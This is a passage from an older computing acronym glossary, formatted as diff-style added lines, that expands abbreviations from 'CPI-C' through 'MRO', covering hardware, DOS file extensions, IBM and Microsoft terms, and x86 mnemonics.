Information (file name extension) [MS-DOS] +CPI-C Common Programming Interface for Communications [IBM] +CPL Current Privilege Level +CP/M Control Program for Microcomputers +CPS Characters Per Second + Cycles Per Second +CPT Command Pass Through +CPU Central Processing Unit +CR Carriage Return +CRC Cyclic Redundancy Check +.CRD Cardfile (file name extension) +CREN Computer Research Education Network + + Corporation for Research and Educational Networking +CRF Cross Reference File +CR/LF Carriage Return/Line Feed +CROM Control Read Only Memory +CRT Cathode Ray Tube +CRTC CRT Controller +CS Chip Select + Clear to Send + Code Segment +C/S Client/Server +CSAR Channel System Address Register +CSD Corrective Service Diskette [IBM] +CSG Constructive Solid Geometry + + Consulting Services Group [Lotus] +CSL Computer Sensitive Language +CSMA/CD Carrier Sense Multiple Access/with Collision Detection +CSNET Computer Science Network +CSS * Continuous System Simulator (Language) +CSP Commercial Subroutine Package + + CompuCom Speed Protocol [CompuCom] +CSTA Computer-Supported Telephony Applications +CSU Channel Service Unit +CSV Comma-Separated Variables + + Common Services Verbs (interface) [Microsoft] +C&T Chips and Technologies +CTOS Computerized Tomography Operating System +CTPA Coax-to-Twisted-Pair Adapter +CTRL Control +CTS Clear To Send +CTSS * Compatible Time Sharing System +CUA Common User Access [IBM] +CUB Cursor Backward +CUD Cursor Down +CUE Custom Updates and Extras (card) [Egghead Software] +CUF Cursor Forward +CUI Common User Interface [IBM] +CUP Cursor Position +CUPID Completely Universal Processor I/O Design [AST] +.CUR Cursor (file name extension) +CUTE Clarkston University Terminal Emulator +CUU Cursor Up +CVF Compressed Volume File +CVGA Color Video Gaphics Array +CVIA Computer Virus Industry Association +CVT Convert +CVW CodeView for Windows +CWD Convert Word to Double Word + + Change Working Directory [Internet] +CWIS Campus Wide Information System [Internet] +C2X Character To Hexadecimal [REXX] +CYL Cylinder +CYMK Cyan-Yellow-Magenta-Black (color model) +D/A Digital to Analog +DAA Data Access Arrangement + + Decimal Adjust for Addition +DAC Data Acquisition and Control + + Digital to Analog Converter +DAL Data Access Language [Apple Computer] + + Disk Access Lockout +DAM Data Acquisition and Monitoring +DAP Data Access Protocol [DEC] +DARI Database Application Remote Interface [IBM] +DAS Decimal Adjust for Subtraction +DASD Direct Access Storage Device +DAT Digital Audio Tape + Disk Array Technology +.DAT Data (file name extension) +DATACOM Data Communications +dB Decibel +DB Data Base + Data Buffer +dBA Adjusted Decibel +DBCS Double-Byte Character Set +.DBF Database (file name extension) +DBM Data Base Manager +DBMS Data Base Management System +DBS Data Base Server +DB2 Database 2 +DC Data Collection + Data Communication + Data Control + + Device Control + Direct Current +D2C Decimal To Character [REXX] +DCA Digital Communications Associates + + Document Content Architecture +DCAF Distributed Console Access Facility [IBM] +DCB Disk Coprocessor Board [Novell] +DCC Digital Compact Cassette + Display Combination Code +DCD Data Carrier Detect +DCE Data Communications Equipment + + Distributed Computing Environment [OSF] + + Distributed Computing Equipment +DCF Data Communication Facility [IBM] + + Data Compression Facility + + Data Count Field [IBM] + + Driver Configuration File [Lotus] +DCL Declaration + DEC Command Language [DEC] + + Device Clear + Digital Control Logic + + Digital Command Language [Digital] +DCS Data Collection System + Data Control System + + Desktop Color Separation +DCT Discrete Cosine Transform +.DCT Dictionary (file name extension) +DD Day + Digital Display + Double Density +DDA Domain-Defined Attribute +DDB Device Dependent Bitmap +DDCMP Digital Data Communications Message Protocol [DEC] +DDCS Distributed Database Connection Services [IBM] +DDD Direct Distance Dialing +DDE Direct Data Entry + Dynamic Data Exchange [Microsoft] +DDEML Dynamic Data Exchange Manager Library [Microsoft] +DDK Device Driver Kit [Microsoft Windows] +DDL Data Definition Language + Data Description Language +DDM Distributed Data Management +DDN Defense Data Network +DDS Dataphone Digital Service [AT&T] + + Design Data Sheet + Digital Data Storage +DEC Decrement + Device Clear + + Digital Equipment Corporation +DEF Desktop Functional Equivalent [Compaq] +.DEF Definitions + Defaults (file name extensions) +DEL Delete +DELSTR Delete String [REXX] +.DEM Demonstration (file name extension) +DES Data Encryption Standard + Data Entry Sheet +.DES Description (file name extension) +DET Device Execute Trigger +DEV Device +DF Data Field + Destination Field + Device Flag + + Double Flag +DFC Data Flow Control +DFS Distributed File System +DFT Diagnostic Funtion Test + Discrete Fourier Transform + + Distributed Function Terminal +DFU Data File Utility +DGIS Direct Graphics Interface Standard +.DHP Dr. Halo PIC (file name extension) +DI Data In + Destination Index +DIA Document Interchange Architecture [IBM] +DIB Device Independent Bitmap +DIBOL DEC Business Oriented Language +.DIC Dictionary (file name extension) +DID Direct Inward Dialing +DIF Data Interchange Format +DIFFSENS Differential Sense +DIIP Direct Interrupt Identification Port +DIN Deutsche Industrie Norm (German equivalent of EIA) +DIO Data Input-Output +DIP Digital Imaging Processing + + Dual In-line Package + Dual In-line Pin +DIR Directory (file) +DIS Dynamic Impedance Stabilization [CompuCom] +DISP Displacement (offset) +DIV Divide +DIW D-Inside Wire [AT&T] +DL Download +DL/1 Data Manipulation Language 1 [IBM] +DLC Data Link Control (protocol) [IBM] +DLE Data Link Escape +DLL Dynamic Link Library +DLM Dynamic Link Module +DLR DOS LAN Requester +DM Distributed Memory +DMA Direct Memory Access/Addressing +DMAC DMA Controller +DME Distributed Management Environment +DMI Desktop Mangement Interface +DML Data Manipulation Language +DMM Digital Multimeter +DMMS Dynamic Memory Management System +DMOS Double-diffused Metal-Oxide Semiconductor +DMP Dot Matrix Printer +DMPC Distributed Memory Parallel Computer +DMQS Display Mode Query and Set [IBM] +DMS Data Management Software + Data Management System +DMSD Digital Multistandard Decoding +DMTF Desktop Management Task Force +DMY Day Month Year +DN Down +DNC Direct Numerical Control +DNIS Dialed Number Identification Service +DNS Domain Naming System +DO Data Out +.DOC Document + Documentation (file name extensions) +DOE Distributed Objects Everywhere +DOS Disk Operating System +DOSEM DOS Emulation +DOW Day Of Week +DP Data Processing +DPA Demand Protocol Architecture [3Com] +DPAREN Data Parity Enable [IBM] +DPB Drive Parameter Block +DPC Direct Program Control +DPI Dots Per Inch +DPL Descriptor Privilege Level +DPM Digital Panel Meter +DPMA Data Processing Management Association +DPMI DOS Protected Mode Interface [Microsoft] +DPO Data Phase Optimization +DPSK Differential Phase Shift Keying +DPtoTP Display Coordinates to Tablet Coordinates + (converting) +DQL DataEase Query Language [DataEase International] +DR Data Received +D/R Direct or Reverse +DRAM Dynamic Random Access Memory +DRAW Direct Read After Write +DRDA Distributed Relational Database Architecture [IBM] +DRDW Direct Read During Write +DRI Digital Research Incorporated +DRO Data Request Output + Destructive Read-Out +.DRS WordPerfect Driver Resource (file name extension) +DRV Drive +.DRV Device Driver (file name extension) (Also see .DVR) +.DRW Draw + Drawing (file name extensions) +DS Data Segment + Data Send + Data Server + Double Sided +DSDD Double Sided, Double Density (diskette) +DSE Data Storage Equipment +DSEA Display Station Emulation Adapter +DSECT Dummy Control Section +DSHD Double Sided, High Density (diskette) +DSIS Distributed Support Information Standard +DSL Dynamic Simulation Language +DSOM Distributed System Object Model +DSP Digital Signal Processing + + Digital Signal Processor +DSQD Double Sided, Quad Density (diskette) +DSR Data Set Ready + Device Status Register + + Device Status Report +DSS Decision Support System +DSTN Double Supertwisted Nematic +DSU Data Service Unit + Digital Service Unit +DSW Data Status Word + Device Status Word +D2T2 Dye Diffusion Thermal Transfer (printing) +DTA Disk Transfer Area +.DTA Data (file name extension) +DTD Document Type Definition +DTE Data Terminal Equipment + Dumb Terminal Emulator +DTL Diode-Transistor Logic +DTMF Data Tone Multiple Frequency + Dual Tone Multifrequency +DTP Desktop Publishing +DTR Data Terminal Ready + Data Transfer Rate +DTV Desktop Video +DTVC Desktop Video Conferencing +DU Disk Usage +DUAT Direct User Access Terminal +.DV DESQview Script (file name extension) +DVI Digital Video Interactive +.DVR Device Driver (file name extension) (Also see .DRV) +DWG Drawing +D2X Decimal To Hexadecimal [REXX] +.DXB Drawing Interchange Binary (file name extension) + [AutoCAD] +DXC Data Exchange Control +DXF Drawing Exchange Format +EA Extended Attribute [OS/2] +EARN European Academic Research Network +EAROM Electrically Alterable Read Only Memory +EARS Electronic Access to Reference Services +EATA Enhanced AT Bus Attachment +EBC EISA Bus Controller +EBCDIC Extended Binary Coded Decimal Interchange Code [IBM] +EBI Equivalent Background Input + + Extended Background Investigation +EBT Electronic Benefits Transfer +ECAL Enjoy Computing And Learn +ECC Error Check Code + Error Checking and Correction + + Error Correction Code +ECD Enhanced Color Display +ECL Emitter Coupled Logic +ECMA European Computer Manufacturers Association +ECP Enhanced Capabilities Port [Microsoft] +ECTL Electronic Communal Temporal Lobe +ED Erase Display +EDA Embedded Document Architecture [Go Corporation] +EDC Enhanced Data Correction + + Error Detection and Correction +EDDC Extended Distance Data Cable +EDI Electronic Data Interchange + + Electronic Document Interchange [DEC] +EDIFACT EDI for Administration Commerce and Transport +EDLC Ethernet Data Link Control +EDLIN Editor (Line Text) +EDOS Enhanced DOS for Windows +EDP Electronic Data Processing +EDPM Electronic Data Processing Machine +EDSAC * Electronic Delay Storage Automatic Computer +EDSI Enhanced Small Device Interface +EDU Education (organization Domain name) [Internet] +EDVAC * Electronic Discrete Variable Automatic Computer + (First stored-program digital computer) +EEC Extended Error Correction +EEG Electroencephalogram +EEM Extended Memory Management +EEMS Enhanced Expanded Memory Specification +EEPROM Electrically Erasable Programmable Read-Only Memory +EFA Extended File Attribute +EFF Electronic Frontier Foundation +EFI Electromechanical Frequency Interference + + Electronics For Imaging +EFL Emitter Follower Logic +EFTS Electronic Funds Transfer System +EGA Enhanced Graphics Adapter +EHLLAPI Emulator High Level Language Application + Programming Interface [IBM] +EIA Electronic Industries Association +EIS Executive Information System +EISA Extended Industry Standard Architecture +EL Electroluminescent (display) + Erase Line +ELF Extremely Low Frequency +ELS Entry Level System +EM Electronic Mail + Expanded Memory +EMA Electronic Mail Association + + Enterprise Management Architecture +E-MAIL Electronic Mail +EMB Extended Memory Block [LIM/AST] +EMBARC Electronic Mail Broadcast to a Roaming Computer [Motorola] +EMC Electromagnetic Compatibility + Extended Math Coprocessor +EMI Electromagnetic Interference +.EML Electronic Mail (file name extension) +EMM Expanded Memory Manager +EMR Electro-Magnetic Radiation +EMS Electronic Mail System + Electronic Message Service + + Expanded Memory Specification [LIM] +.ENC Encoded (file name extension) +ENDS Ends Segment +ENIAC * Electronic Numerical Integrator Analyzer and + Computer (First fully electronic digital computer) +ENQ Enquiry +ENSS Exterior Nodal Switching Subsystem [Internet] +EOA End of Address +EOB End of Block +EOC End of Conversion +EOF End of File +EOI End or Identify +EOJ End of Job +EOL End of Line + End of List +EOM End of Message +EOR Exclusive OR (Also XOR) +EOS End of String +EOT End Of Table + End of Tape (marker) + End of Text + + End of Transmission +EPL Effective Privilege Level +EPLD Electrically Programmable Logic Device +EPM Enhanced Editor for Presentation Manager [IBM] + + Enterprise Process Management [IBM] +EPP Enhanced Parallel Port +EPROM Electrically Programmable Read Only Memory + + Erasable Programmable Read Only Memory +.EPS Encapsulated PostScript (file name extension) +EPSF Encapsulated PostScript Files +ERAS Electronic Routing and Approval System [Hughes Aircraft] +ERLL Enhanced Run Length Limited +EROM Erasable Read Only Memory +ERR Error +ES Extra Segment +ESA European Space Agency +ESC Escape +ESCM Extended Services Communications Manager [IBM] +ESCON Enterprise System Connection (Architecture) [IBM] +ESD Electronic Software Distribution + + Electrostatic Discharge +ESDI Enhanced Small Device Interface +ESI Enhanced Serial Interface (specification) [Hayes] +ESP Emulation Sensing Processor + + Enhanced Serial Port [Hayes] +ESS Electronic Switching System +ESU Electro-Static Unit +ETANN Electrically Trainable Analog Neural + Network (chip) [Intel] +ETB End of Transmission Block +ETC Enhanced Throughput Cellular [AT&T] +ETPL Endorsed Tempest Products List +ETS Econometric Time Series +ETX End of Text +EU Execution Unit +EVE Extensible VAX Editor +EVGA Extended Video Graphics Array + + Extended Video Graphics Adapter +EWS Employee Written Software [IBM] +.EXE Executable (file name extension) +EXE2BIN Program used to convert an (.EXE) file to binary + format (.COM) file +EXP Exponent +EXT External +EXTRN External Reference +FAB Computer-Chip Fabrication Plant +FAC File Access Code +FAMOS Floating Gate Avalanche MOS +FAP File Access Protocol +FAPI Family Application Program Interface +FAQ Frequently Asked Question +FAT File Allocation Table +FAX Facsimile +.FAX Fax (file name extension) +FCB File Control Block +FCC Federal Communications Commission +FCI Flux Changes per Inch +FD Floppy Disk + Floppy Drive + Full Duplex +FDC Floppy Disk Controller +FDDI Fiber Digital Device Interface + + Fiber Distributed Data Interface +FDISK Fixed Disk +FDM Frequency-Division Multiplexing +FDX Full Duplex +FEFO First-Ended, First-Out +FEP Front End Processor +FESDK Far East Software Development Kit [Microsoft] +FET Field Effect Transistor +FF Flip-Flop + Form Feed +FFST First Failure Support Technology [IBM] +FFT Fast Fourier Transform +FIF Fractal Image Format +FIFO First-In, First-Out +FILO First-In, Last-Out +FIP File Processor Buffering +FIR Finite Impulse Response +FLC Ferro-electric Liquid Crystal +FLD Field +FLL FoxPro Link Library [Microsoft Fox Pro] +FLOPS Floating Point Operations Per Second +FMS Forms Management System +FMT Format +FNT Font +FOCUS Forum of Control Data Users +FOG First Osborne Group +FOIRL Fiber Optic Inter Repeater Link [IEEE] +.FON Font + Phone + Phone Directory (all file name + extensions) +.FOR FORTRAN source code (file name extension) +FORTH (Programming Language)(See HLL) +FORTRAN Formula Translator (Programming Language)(See HLL) +FOSE Federal Office Systems Exposition +FOSSIL Fido/Opus/Seadog Standard Interface Layer +FPGA Field Programmable Gate-Array +FPLA Field Programmable Logic-Array +FPP Fixed Path Protocol + Floating Point Processor +FPS Frames Per Second +FPU Floating Point Unit +FQDN Fully Qualified Domain Name [Internet] +FRAG Fragment + Fragmentation +FRAM Ferroelectric Random-Access Memory +FRED Frame Editor +FRPI Flux Reversals Per Inch +.FRS WordPerfect Graphics Driver (file name extension) +FS File Separator +FSD File System Driver [OS/2] +FSK Frequency Shift Keying +F/T Full Time +FTAM File Transfer, Access and Management + + File Transfer and Access Method +FTM Flat Tension Mask [Zenith] +FTP File Transfer Protocol [Internet] +FTS Federal Telecommunication System +FUI File Update Information +FUNC Function +FVT Full Video Translation +FYI For Your Information +GA General Availability +GAAP Generally Accepted Accounting Principles +GAL Generic Array Logic +GAPI Gateway Application Programming Interface +Gb Gigabit (1,000 megabits) + + (One Billion Bits of Information) +GB Gigabyte (1,000 megabytes) + + (One Billion Characters of Information) +GCR Group Code Recording +GDA Global Data Area +GDDM Graphics Data Display Manager +GDI Graphics Device Interface +GDT Geometric Dimensioning and Tolerancing + + Global Descriptor Table +GEIS General Electric Information Service (company) +GEM Graphics Environment Manager (DRI Program) +GENIE General Electric Network for + Information Exchange +GEOS Graphic Environment Operating System [Geoworks] +GET Get Execute Trigger +GHZ Gigahertz +.GIF Graphic Interchange Format (file name extension) +GIGO Garbage In, Garbage Out +GIS Geographic Information System +GIX Global Internet Exchange [Internet] +GKS Graphical Kernal System +G/L General Ledger +GLM General Linear Models +.GLY Glossary (file name extension) [Microsoft Word] +GMS Global Messaging Service [Novell] +GMT Greenwich Mean Time +GND System Ground +GNU Gnu's Not Unix (operating system) +GOSIP Government Open Systems Interconnection Profile +GOV Government (organization Domain name) [Internet] +GP Gas Plasma + General Purpose +GPF General Protection Fault +GPI Graphics Programming Interface +GPIB General Purpose Interface Bus +GPS Global Positioning System +GPSS * General Purpose Systems Simulator (language) +GRE Graphics Engine +.GRF Graph (file name extension) +.GRP Group (file name extension) +GS Group Separator +GUI Graphical User Interface +GW-BASIC Gee Whiz BASIC +.H Header (file name extension) [C] +HACMP High Availability Cluster Multi-Processing [IBM] +HAL Hard Array Logic + House Programmed Array Logic +HAL * Heuristically Programmed Algorithmic (computer) + [from 1968 movie "2001: A Space Odyssey"] +HASP Houston Automatic Spooling Priority (System) +HBA Host Bus Adapter +HD Hard Disk + High Density +HDA Head Disk Assembly +HDCD High Definition Compatible Digital +HDI Head to Disk Interference +HDLC High-Level Data Link Control +HDR Header +HDSC High Density Signal Carrier [DEC] +HDSL High-rate Digital Subscriber Link +HDTV High Definition Television +HDW Hardware +HDX Half Duplex +HERC Hercules +HEX Hexadecimal +HGA Hercules Graphics Adapter +HGCP Hercules Graphics Card Plus +HH Hour +HIFD High-Density Floppy Disk +HIL Human Interface Link [HP] +HLCO High Low Close Open +HLL High Level Language +HLLAPI High Level Language Application Programming Interface +.HLP Help (file name extension) +HLQ High Level Qualifier +HLS Hue, Luminance, Saturation (color model) +HLT Halt +HMA High Memory Area [Microsoft] + + Hub Management Architecture +HMOS High Density Metal Oxide Semiconductor + + High Speed Metal Oxide Semiconductor +HP Hewlett-Packard (Company) +HPCC High Performance Computing and Communications +HPDJ Hewlett-Packard Desk Jet +HPFS High-Performance File System +HPG Hewlett-Packard Graphics +HPGL Hewlett-Packard Graphics Language +HPIB Hewlett-Packard Interface Bus +HPLJ Hewlett-Packard Laser Jet +HPPA Hewlett-Packard Precision Architecture +HPPI High Performance Parallel Interface +HPW High Performance Workstation [Sun] +HRIS Human Resource Information System +HRG High Resolution Graphics +HRMS Human Resource Management System +HS High Speed +HSC High Speed Channel +HSM Hierarchical Storage Management +HSP High Speed Printer +HSSI High Speed Serial Interface +HST High Speed Technology [U.S. Robotics] +.HST History + Host (file name extensions) +HSV Hue Saturation Value +HUT Hopkins Ultraviolet Telescope +H/V Horizontal/Vertical +HVP Horizontal & Vertical Position +H/W Hardware +HWCP Hardware Code Page +HWD Height-Width-Depth +.HYP Hyphenation (file name extension) +Hz Hertz +IAB Internet Activities Board [Internet] +IAC Interapplication Communication +IAL * International Algebraic Language + (ALGOL was first called IAL) +IANA Internet Assigned Numbers Authority [Internet] +IAT Import Address Table +IBC Instrument Bus Computer +IBM International Business Machines (Corporation) +IBM-GL IBM Graphics Language +IC Input Circuit + Integrated Circuit + Interrupt Controller +ICA Intra-application Communications Area +ICAS Intel Communicating Applications Specifications +ICCP Institute for the Certification of Computer Professionals +ICE In-Circuit Emulator [Intel] +ICL Interface Clear +ICMP Internet Control Message Protocol [Novell] +.ICO Icon (file name extension) +iCOMP Intel Comparative Microprocessor (index) [Intel] +ICP Integrated Channel Processor +ICR Intelligent Character Recognition +ICS Intuitive Command Structure +ID Identification + Identifier +IDA Integrated Digital Access + Intelligent Disk Array + + Intelligent Drive Array +IDAPI Integrated Database Application Programming Interface +IDE Imbedded Drive Electronics + + Integrated Development Environment [Borlund] + + Integrated Drive Electronics + + Intelligent Drive Electronics + + Interactive Design and Engineering + + Interface Design Enhancement +IDF Intermediate Distribution Frame +IDIV Integer Divide +IDMS Integrated Data Base Management System +IDP Integrated Data Processing +IDT Interrupt Descriptor Table +.IDX Index (file name extension) +IEEE Institute of Electrical and Electronics Engineers +IEF Information Engineering Facility +IEMSI Interactive Electronic Mail Standard + Identification +IETF Internet Engineering Task Force +I/F Interface +IFD Image File Directory +IFG Incoming Fax Gateway +IFS Installable File System [OS/2] +IGA Integrated Graphics Array +IGC Integrated Graphics Controller +IIF Immediate IF +IIR Immediate Impulse Response +IMDS Image Data Stream (format) [IBM] +IMG Image +IMP Interface Message Processor +IMPA Intelligent Multi-Port Adapter [DCA] +IMS Information Management System + + Intermediate Maintenance Standards +IMTV Interactive Multimedia Television +IMUL Integer Multiply +IN Input +INC Increment +.INF Information (file name extension) +.INI Initialize (file name extension) +INIT Initialize +INM Integrated Network Management +INS Input String +INT Integer + Internal + Interrupt + + International (organization Domain name) [Internet] +INTA Interrupt Acknowledge +InterNIC Internet Network Information Center [Internet] +INTO Interrupt if Overflow occurs +I/O Input/Output +IOCS Input/Output Control System +IOCTL Input/Output Control +IOPL Input/Output Priviledge Level +IOSGA Input/Output Support Gate Array +IP Instruction Pointer + Internet Protocol +IPC Instructions Per Clock + Interprocess Communication +IPDS Intelligent Printer Data Stream [IBM] +IPF Information Presentation Facility +IPL Initial Program Load/Loader + + Ion Projection Lithography +IPL * Information Programming Language +IPM Interpersonal Message +IPSE Integrated Project Support Environment +IPX Internetwork Packet Exchange [Novell] +IQL Interactive Query Language +IRC Internet Relay Chat [Internet] +IRDS Information Resource Dictionary System +IRET Interrupt Return +IRL Interactive Reader Language + Inter-Repeater Link +IRLED Infrared Light Emitting Diode +IRM Information Resource Management +IRQ Interrupt Request +IRX Information Retrieval Experiment +IS Information System + Interrupt Status +ISA Industry Standard Architecture +ISAM Indexed Sequential-Access Management/Method +ISBN International Standard Book Number +ISC Instruction Set Computer +ISD Image Section Descriptor + + Instructional Systems Design +ISDN Integrated Services Digital Network +ISI Internally Specified Index +ISIS Integrated Systems and Information Services +ISL Interactive System Language +ISMF Interactive Storage Management Facility +ISO/OSI International Standards Organization/Open Systems + Interconnection (model) +ISP Internet Service Provider [Internet] + + Interrupt Stack Pointer + Interrupt Status Port +ISPF Interactive System Programming Facility +ISR Information Storage and Retrieval + + Interrupt Service Routine +ISSN International Standard Serial Number +ISV Independent Software Vendor +ITB Information Technology Branch + Intermediate Text Block +ITC International Typeface Corporation +ITU International Telecommunication Union +ITUG International Telecommunications User Group +ITV Interactive Television +ITX Intermediate Text Block +IVIS Interactive Video Information System +IVR Interactive Voice Response +IVS Interactive Videodisk System +IVT Interrupt Vector Table +IV&V Independent Verification & Validation +JA Jump Address + Jump if Above +JAD Joint Application Design +JAE Jump if Above or Equal +JANET Joint Academic Network +JBE Jump if Below or Equal +JC Jump if Carry set +JCL Job Control Language +JE Jump if Equal +JEDEC Joint Electronic Devices Engineering Council +JEIDA Japanese Electronics Industry Development Association +JES Job Entry System +JFET Junction Field Effect Transistor +JG Jump if Greater +JGE Jump if Greater or Equal +JL Jump if Less +JLE Jump if Less than or Equal to +JMP Jump +JNA Jump if Not Above +JNAE Jump if Not Above or Equal +JNB Jump if Not Below +JNBE Jump if Not Below or Equal +JNG Jump if Not Greater +JNGE Jump if Not Greater or Equal +.JNK Junk (file name extension) +JNLE Jump if Not Less or Equal +JNO Jump if No Overflow +JNP Jump if No Parity +JNS Jump if No Sign +JPE Jump if Parity Even +JPEG Joint Photographic Experts Group +JPL Jet Propulsion Laboratory +JPO Jump if Parity Odd +JS Jump if Sign +JZ Jump if Zero +JNZ Jump if Not Zero +KB Keyboard + Kilobyte (1,024 bytes) +KBD Keyboard (also KEYB) +KBD$ Keyboard [OS/2] +Kbit Kilobit +KBPS Kilobytes Per Second +KDT Key Definition Table +KEYBBE Foreign language KEYBoard program - Belgium +KEYBBR Foreign language KEYBoard program - Brazil +KEYBCF Foreign language KEYBoard program - Canadian-French +KEYBCZ Foreign language KEYBoard program - Czechoslovakia +(Czech) +KEYBDF Foreign language KEYBoard program - Denmark +KEYBFR Foreign language KEYBoard program - France +KEYBGR Foreign language KEYBoard program - Germany +KEYBHU Foreign language KEYBoard program - Hungary +KEYBIT Foreign language KEYBoard program - Italy +KEYBLA Foreign language KEYBoard program - Latin America +KEYBNL Foreign language KEYBoard program - Netherlands +KEYBNO Foreign language KEYBoard program - Norway +KEYBPL Foreign language KEYBoard program - Poland +KEYBPO Foreign language KEYBoard program - Portugal +KEYBSF Foreign language KEYBoard program - Swiss-French +KEYBSG Foreign language KEYBoard program - Swiss-German +KEYBSL Foreign language KEYBoard program - Czechoslovakia +(Slovak) +KEYBSP Foreign language KEYBoard program - Spain +KEYBSU Foreign language KEYBoard program - Finland +KEYBSV Foreign language KEYBoard program - Sweden +KEYBUK Foreign language KEYBoard program - United Kingdom +KEYBUS Foreign language KEYBoard program - United States +KEYBYU Foreign language KEYBoard program - Yugoslavia +kHz Kilohertz +KPI Kernal Programming Interface +KSPH Keystrokes Per Hour +KSR Keyboard Send Receive +KRS Knowledge Retrieval System +LADDR Layered Device Driver Architecture [Microsoft] +LALL Longest Allowed Lobe Length +LAN Local Area Network +LAPB Link Access Procedure Balanced (protocol) +LAPD Link Access Procedure Direct (protocol) +LAPM Link Access Procedure for Modems +LAR Load Access Rights +LASTport Local Area Storage Transport (protocol) [DEC] +LAT Local Area Transport [DEC] +LAVC Local Area VAX Cluster +LAWN Local Area Wireless Network +LB Left Button (of 2 or 3 button Mouse) +LBL Label +LBR Librarian +.LBR Library (file name extension) +LBT Listen Before Talk +LCC Leadless Chip Carrier +LCD Liquid Crystal Display +LCK Library Construction Kit [Mircrosoft FoxPro] +LCP Link Control Protocol (protocol) +LCU Last Cluster Used +LDA Logical Device Address +LDC Lotus Development Corporation +LDM Long Distance Modem +LDT Local Descriptor Table +LE Less or Equal +LEA Load Effective Address +LED Light Emitting Diode +LEM Language Extension Module +LEN Low Entry Networking +.LET Letter (file name extension) +LEX Lexicon +LF Line Feed +LFI Last File Indicator +LFU Least Frequently Used +LGDT Load Global Descriptor Table +.LIB Library (file name extension) +LICS Lotus International Character Set [LDC] +LIDT Load Interrupt Descriptor Table +LIEP Large Internet Exchange Packet [Novell] +LIF Low Insertion Force +LIFO Last In, First Out +LILO Last In, Last Out +LIM Lotus/Intel/Microsoft +LIMA Lotus/Intel/Microsoft/AST +LIMS Library Information Management System +LIPS Logical Inferences Per Second +LISP List Processing (Language)(See HLL) +LLC Logical Link Control +LLDT Load Local Descriptor Table +LMBCS Lotus Multibyte Character Set [Lotus] +LMI Local Management Interface +LMSW Load Machine Status Word +LM/X LAN Manager for Unix +LN Logarithm (Natural) +LNDI Lotus Notes:Document Imaging +LOC Loop On-Line Control +LOCIS Library of Congress Information System +LODSB Load String Byte +LOG Logarithm (Base 10) +LOGO (Programming Language)(See HLL) +LOOPE Loop while Equal +LOOPNE Loop while Not Equal +LOOPNZ Loop while Not Zero +LOOPZ Loop while Zero +LORE Line Oriented Editor +LPC Local Procedure Call +LPD Line Printer Daemon (protocol) [Berkley] +LPI Lines Per Inch +LPL Lotus Programming Language [Lotus 1-2-3] [LDC] +LPM Lines Per Minute +LPN Logical Page Number +LPS Low-Power Schottky +LPT Line Printer +LPT1 First Parallel Printer Port +LPT2 Second Parallel Printer Port +LPT3 Third Parallel Printer Port +LQ Letter Quality +LQM Link Quality Monitoring (protocol) +LRC Local Register Cache + + Longitudinal Redundancy Check +LRL Least Recently Loaded +.LRS Language Resource (file name extension) [WordPerfect] +LRU Least Recently Used +LSA Line Sharing Adapter +LSAPI License Services Application Program Interface [SPA] +LSB Least Significant Bit +LSC Least Significant Character +LSD Least Significant Digit +LSI Large Scale Integration +LSL Load Segment Limit +LST List +.LST List (file name extension) +LTR Left-To-Right + Letter + Load Task Register +LU Logical Unit (Also LUN) +LUA Logical Unit Application (interface) +LUI Local User Input +LUT Lookup Table +LZ Lazy Write +LZW Lempel-Ziv-Walsh (algorithm) +mA Milliampere +MAC Media/Medium Access Control +.MAC MacPaint (file name extension) + + Macro (file name extension) +MACH Multilayer Actuator Head [Epson] +mAh Milliampere-Hour +.MAI Mail (file name extension) +MAN Manual + Metropolitan Area Network +MAP Maintenance Analysis Procedures + + Manufacturing Automation Protocol + + Memory Allocation Map +.MAP Linker Map (file name extension) +MAPI Mail/Messaging Applications Programming + Interface [Microsoft] +MAPICS Manufacturing, Accounting and Production + Information Control System [IBM] +MASM Macro Assembler [Microsoft] +MASS Maximum Availability and Support + Subsystem [Parallan] +MAU Media Access Unit + Multistation Access Unit +MAVDM Multiple Application VDM +MAX Maximum +MB Megabyte (1,000 kilobytes) + + Middle Button (of 3 button Mouse) +MBASIC Microsoft BASIC [Microsoft] +MBPS Megabytes Per Second +MBR Master Boot Record +MBX Mailbox +MCA Micro Channel Architecture [IBM] +MCB Memory Control Block +MCGA Multicolor Graphics Array +MCI Media Control Interface [Microsoft] +MCL Microsoft Compatibility Labs [Microsoft] +MCU Multi-Chip Unit [DEC] +MD Make Directory + Monochrome Display +MDA Monochrome Display Adapter +.MDF Menu Definition File (file name extension) +MDI Multiple Document Interface +MDIC Manchester Decoder and Interface Chip [AT&T] +MDK Multimedia Developers Kit [Microsoft] +MDR Minimum Design Requirement +MDY Month Day Year +.ME Opening Information (file name extension) (As in READ.ME) +MEB Memory Expansion Board +MEG Megabyte +.MEN Menu (file name extension) +MESI Modified Exclusive Shared and Invalid (protocol) +MFFS Microsoft Flash File System [Microsoft] +MFLOPS Million Floating Point Operations Per Second +MFM Modified Frequency Modulation +MFP Multifunction Peripheral +MFS Magnetic Tape Field Search + + Modified Filing System [Revelation Technologies] +MFT Multiprogramming with a Fixed number of Tasks +MGA Monochrome Graphics Adapter +MGE Modular GIS Environment +MGR Manager +MHS Message Handling Service + Message Handling System +MHz Megahertz +MIB Management Information Base +MICS Macro Interpretive Commands +MIDI Musical Instrument Digital Interface +MIF Management Information Format +MII Microsoft/IBM/Intel +MIL Machine Interface Layer [Go Corporation] + + Military (organization Domain name) [Internet] +MIM Metal-Insulator-Metal (screen) +MIMD Multiple Instruction Multiple Data Stream (processor) +MIME Multipurpose Internet Mail Extension [Internet] +MIN Minimum +MIPS Million Instructions Per Second +MIS Management Information System +MISC Miscellaneous +MIX Member Information Exchange +MKDIR Make Directory +ML Machine Language +MM Minutes + Month +MMA Microcomputer Managers Association +MMC Matched Memory Cycle + Microcomputer Marketing Council +MMIS Materials Manager Information System +MMPM Multi Media Presentation Manager +MMU Memory Management Unit +MNOS Metal Nitride Oxide Semiconductor +MNP Microcom Networking Protocol [Microcom] +.MNU Menu (fine name extension) +MO Magneto-Optical (disk drive) +MODEM Modulator Demodulator +MOHLL Machine Oriented High Level Language +MOV Metal Oxide Varistor + Move +MOVS Move String +MOD Modem + Modulus +MOP Maintenance Operations Protocol +MOS Metal Oxide Semiconductor +MOSFET Metal Oxide Semiconductor Field Effect Transistor +MOV Move +MOVS Move String +MP Multiple Processors +MPC Multimedia Personal Computer +MPCS Mission Planning and Control Station (Software) +MPEG Moving Picture Experts Group +MPP Massively Parallel Processing + + Message Processing Program +MPR Multipart Repeater +MPU Microprocessor Unit +MR Modem Ready +MRCF Microsoft Realtime Compression Format +MRCI Microsoft Realtime Compression Interface +MRI Magnetic Resonance Imaging +MRO Multi-Region Operation 